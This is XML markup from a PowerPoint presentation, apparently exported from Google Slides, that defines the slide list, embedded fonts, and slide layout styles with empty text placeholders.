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8"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="267" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="271" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="261" r:id="rId14"/>
    <p:sldId id="275" r:id="rId15"/>
    <p:sldId id="276" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId19"/>
      <p:bold r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Century Schoolbook"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iCB2lOQH9Tx7F36gssGNwp2A29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3.fntdata"/><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font" Target="fonts/font1.fntdata"/><Relationship Id="rId52"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5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3478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9498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6161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11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7578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6770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166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938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8523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571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5462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3810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047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2976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bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="343437"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 12"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;13;p33"/>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3"/>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a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;15;p33"/>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3"/>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3"/>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1pPr>
            <a:lvl2pPr marL="0" lvl="1"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2pPr>
            <a:lvl3pPr marL="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="0" lvl="8"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s-ES"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;18;p33"/>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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5105400"/>
            <a:ext cx="11292840" cy="1752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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5257800"/>
            <a:ext cx="9982200" cy="914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800"/>
              <a:buFont typeface="Century Schoolbook"/>
              <a:buNone/>
              <a:defRPr sz="28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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="11292840" cy="5128923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="6108589"/>
            <a:ext cx="9982200" cy="59701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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1040"/>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="D8D8D8"/>
                </a:solidFill>
              </a:defRPr>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0"/>
              <a:buNone/>
              <a:defRPr sz="1000"/>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83" name="Google Shape;83;p41"/>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1"/>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1"/>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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Google Shape;87;p42"/>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42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3383884" y="-293212"/>
            <a:ext cx="4351337" cy="859536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89" name="Google Shape;89;p42"/>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2"/>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42"/>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92"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Google Shape;93;p43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6938169" y="2091531"/>
            <a:ext cx="5897562" cy="24765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43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1680369" y="-537369"/>
            <a:ext cx="5897562" cy="773430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95" name="Google Shape;95;p43"/>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3"/>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43"/>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bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="343437"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 26"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Google Shape;27;p32"/>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2"/>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a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Google Shape;29;p32"/>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2"/>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2"/>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1pPr>
            <a:lvl2pPr marL="0" lvl="1"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2pPr>
            <a:lvl3pPr marL="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="0" lvl="8"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s-ES"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;32;p32"/>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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;34;p34"/>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4"/>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36" name="Google Shape;36;p34"/>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4"/>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4"/>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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;40;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="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7200"/>
              <a:buFont typeface="Century Schoolbook"/>
              <a:buNone/>
              <a:defRPr sz="7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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"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marL="457200" lvl="0" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1760"/>
              <a:buNone/>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Google Shape;42;p35"/>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5"/>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5"/>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
        <p:nvSpPr>
          <p:cNvPr id="45" name="Google Shape;45;p35"/>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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Google Shape;47;p36"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261872" y="1828800"/>
            <a:ext cx="44805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49" name="Google Shape;49;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126480" y="1828800"/>
            <a:ext cx="44805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50" name="Google Shape;50;p36"/>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6"/>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6"/>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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;54;p37"/>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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261872" y="1713655"/>
            <a:ext cx="4480560" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261872" y="2507550"/>
            <a:ext cx="4480560" cy="366465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57" name="Google Shape;57;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126480" y="1713655"/>
            <a:ext cx="4480560" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Century Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Google Shape;58;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126480" y="2507550"/>
            <a:ext cx="4480560" cy="366465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59" name="Google Shape;59;p37"/>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7"/>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7"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p38"/>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8"/>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8"/>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8"/>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67"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p39"/>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9"/>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9"/>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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Google Shape;72;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841248" y="457200"/>
            <a:ext cx="3200400" cy="160019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entury Schoolbook"/>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40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4504267" y="685800"/>
            <a:ext cx="6079066" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-330200" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
